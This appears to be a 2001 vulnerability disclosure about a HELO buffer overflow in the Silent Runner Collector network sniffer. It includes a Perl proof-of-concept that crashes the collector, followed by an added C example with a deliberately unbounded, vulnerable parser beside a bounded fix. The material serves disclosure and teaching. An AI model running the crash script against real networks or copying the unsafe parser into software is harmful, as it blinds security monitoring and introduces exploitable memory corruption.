From: Jack Hayes (jackhayesCABLESPEED.COM)
Date: Thu Mar 29 2001 - 19:06:19 CST


    Hello,

    Silent Runner Collector (SRC) has a buffer overflow condition in the
    routines that parse SMTP traffic. SRC is the "sniffer" component of the
    Silent Runner network traffic analysis suite. The overflow was noticed
    in SRC v1.6.1 but is likely present in other versions as well. The
    actual buffer in question holds the SMTP HELO line. The overflow occurs
    when a HELO command in excess of 4096 bytes transits a network segment
    that the collector is monitoring. This vulnerability can be exploited by
    an intruder to crash the collector and thus stop the monitoring of
    transiting network traffic. I'm not sure if this bug can be exploited in
    such a way as to allow for the execution of code on the sensor. Maybe
    someone else has some insight into the possibilities for arbitrary code
    execution?

    Jack

    #!/usr/bin/perl
    # This is a simple script that demonstrates the
    # SRC HELO overflow vulnerability. It will result
    # in a crashed silent runner collector so please do
    # not use it on production networks. It is intended
    # for demonstration purposes only.

    use strict;
    use warnings;
    use IO::Socket;

    # Any SMTP listener on a segment the collector is sniffing will do;
    # the target of the overflow is the collector, not this host.
    my $remote_host = '192.168.111.3';
    my $remote_port = 25;

    my $buf = 'A' x 4092;

    my $socket = IO::Socket::INET->new(PeerAddr => $remote_host,
                                       PeerPort => $remote_port,
                                       Proto    => "tcp",
                                       Type     => SOCK_STREAM)
        or die "Can't connect to $remote_host:$remote_port : $!\n";

    # 'HELO ' + $buf = 4097 bytes ( 1 byte too much)
    print $socket "HELO $buf";

    close $socket;
    exit;
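The flaw described above is the familiar fixed-buffer line copy in a packet parser. The following is an added example (not Silent Runner code, and not part of the original post): a sniffer-side HELO line parser built the way the advisory describes, with a 4096-byte buffer, shown first in the unbounded form and then in a bounded form that reports an oversized line instead of copying it. The function names, the HELO_* return codes and the probe builder that reproduces the posted 4097-byte payload are this example's own inventions.

```c
/* Added example, not Silent Runner code. Models a sniffer's SMTP HELO
 * parser with the 4096-byte buffer the advisory describes. All names
 * here (helo_line_len, parse_helo_unsafe, parse_helo_safe, build_probe,
 * probe_result, probe_host_ok) are invented for this illustration. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HELO_BUF 4096            /* buffer size stated in the advisory */

enum { HELO_OK = 0, HELO_OVERSIZE = -1, HELO_NOT_HELO = -2 };

/* Length of the command line in pkt up to (excluding) CR or LF, or the
 * whole payload if no terminator has arrived (the posted probe sends
 * none, so a sniffer sees 4097 bytes of "line"). */
size_t helo_line_len(const char *pkt, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (pkt[i] == '\r' || pkt[i] == '\n')
            return i;
    return len;
}

/* SMTP verbs are case-insensitive; match "HELO " without strncasecmp. */
static int is_helo(const char *s, size_t n)
{
    return n >= 5 && toupper((unsigned char)s[0]) == 'H' &&
           toupper((unsigned char)s[1]) == 'E' &&
           toupper((unsigned char)s[2]) == 'L' &&
           toupper((unsigned char)s[3]) == 'O' && s[4] == ' ';
}

/* VULNERABLE pattern, for illustration only and never called here:
 * the line is copied into a 4096-byte stack buffer with no bound, so a
 * line longer than 4096 bytes (or exactly 4096 once the NUL is added)
 * writes past the end of line[]. */
int parse_helo_unsafe(const char *pkt, size_t len, char *host, size_t hostsz)
{
    char line[HELO_BUF];
    size_t n = helo_line_len(pkt, len);
    memcpy(line, pkt, n);              /* overflow when n >= HELO_BUF */
    line[n] = '\0';
    if (!is_helo(line, n)) return HELO_NOT_HELO;
    snprintf(host, hostsz, "%s", line + 5);
    return HELO_OK;
}

/* Bounded version: the line and its terminator must fit, otherwise the
 * parser reports HELO_OVERSIZE and copies nothing. The host argument is
 * copied only if it fits the caller's buffer as well. */
int parse_helo_safe(const char *pkt, size_t len, char *host, size_t hostsz)
{
    char line[HELO_BUF];
    size_t n = helo_line_len(pkt, len);
    if (n >= sizeof line)              /* room for the NUL is required */
        return HELO_OVERSIZE;
    memcpy(line, pkt, n);
    line[n] = '\0';
    if (!is_helo(line, n)) return HELO_NOT_HELO;
    if (n - 5 >= hostsz) return HELO_OVERSIZE;
    memcpy(host, line + 5, n - 5);
    host[n - 5] = '\0';
    return HELO_OK;
}

/* Constructed input: the exact payload of the posted Perl script,
 * "HELO " followed by n_as 'A' bytes and no CRLF. Caller frees. */
char *build_probe(size_t n_as)
{
    char *p = malloc(5 + n_as + 1);
    if (!p) return NULL;
    memcpy(p, "HELO ", 5);
    memset(p + 5, 'A', n_as);
    p[5 + n_as] = '\0';
    return p;
}

/* Result of the bounded parser on a probe with n_as 'A's. */
int probe_result(size_t n_as)
{
    char host[HELO_BUF];
    char *p = build_probe(n_as);
    int r = p ? parse_helo_safe(p, strlen(p), host, sizeof host) : HELO_OVERSIZE;
    free(p);
    return r;
}

/* 1 if the bounded parser accepted the probe and extracted n_as 'A's. */
int probe_host_ok(size_t n_as)
{
    char host[HELO_BUF];
    char *p = build_probe(n_as);
    if (!p) return 0;
    int ok = parse_helo_safe(p, strlen(p), host, sizeof host) == HELO_OK &&
             strlen(host) == n_as && strspn(host, "A") == n_as;
    free(p);
    return ok;
}

int main(void)
{
    printf("4092 A's (4097-byte line): %d\n", probe_result(4092));  /* -1 */
    printf("4090 A's (4095-byte line): %d\n", probe_result(4090));  /*  0 */
    return 0;
}
```

The boundary worth noting is the `n >= sizeof line` test: a check of `n > HELO_BUF` would still let a 4096-character line through and put the terminating NUL one byte past the buffer, which is exactly the "1 byte too much" case the posted script is built around.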